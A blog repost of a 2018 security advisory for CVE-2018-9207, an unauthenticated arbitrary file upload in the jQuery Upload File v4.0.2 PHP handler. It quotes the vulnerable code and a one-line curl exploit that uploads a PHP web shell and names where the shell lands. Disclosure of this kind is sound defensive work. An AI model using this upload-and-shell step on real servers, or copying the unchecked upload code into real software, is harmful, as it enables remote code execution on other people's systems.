KangBlogger Tukang Rebahan Yang Nulis Artikel Kalo Lagi Santay Dan Berharap Cuan.

Arbitrary file upload vulnerability in jQuery Upload File v4.0.2

47 sec read

Situs Download Drakor Sub Indo

Title: Arbitrary file upload vulnerability in jQuery Upload File v4.0.2
Author: Larry W. Cashdollar, @_larry0
Date: 2018-11-02
CVE-ID:[CVE-2018-9207]
CWE: CWE-434 arbitrary file upload
Download Site: http://hayageek.com/docs/jquery-upload-file.php
Vendor: Hayageek
Vendor Notified: 2018-11-02
Vendor Contact: [email protected]
Advisory: http://www.vapidlabs.com/advisory.php?v=206
Description: jQuery Upload File plugin provides Multiple file Uploads with progress bar.Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.
Vulnerability:The code in https://github.com/hayageek/jquery-upload-file/blob/master/php/upload.php doesn’t check for a file type or for requiring any authentication allowing a user to upload an executable file to the /uploads/ directory if it exists. if(!is_array($_FILES[“myfile”][“name”])) //single file { $fileName = $_FILES[“myfile”][“name”]; move_uploaded_file($_FILES[“myfile”][“tmp_name”],$output_dir.$fileName); $ret[]= $fileName; } else //Multiple files, file[] { $fileCount = count($_FILES[“myfile”][“name”]); for($i=0; $i < $fileCount; $i++) { $fileName = $_FILES[“myfile”][“name”][$i]; move_uploaded_file($_FILES[“myfile”][“tmp_name”][$i],$output_dir.$fileName); $ret[]= $fileName; }

Exploit Code:

$ curl  -F  "[email protected]" "http://example.com/jquery-upload-file/php/upload.php"["shell.php"] Where shell is https://github.com/lcashdol/shittyshell/blob/master/shittyshell.php  Shell is located http://example.com/jquery-upload-file/php/uploads/shell.php
KangBlogger Tukang Rebahan Yang Nulis Artikel Kalo Lagi Santay Dan Berharap Cuan.

Leave a Reply

Your email address will not be published. Required fields are marked *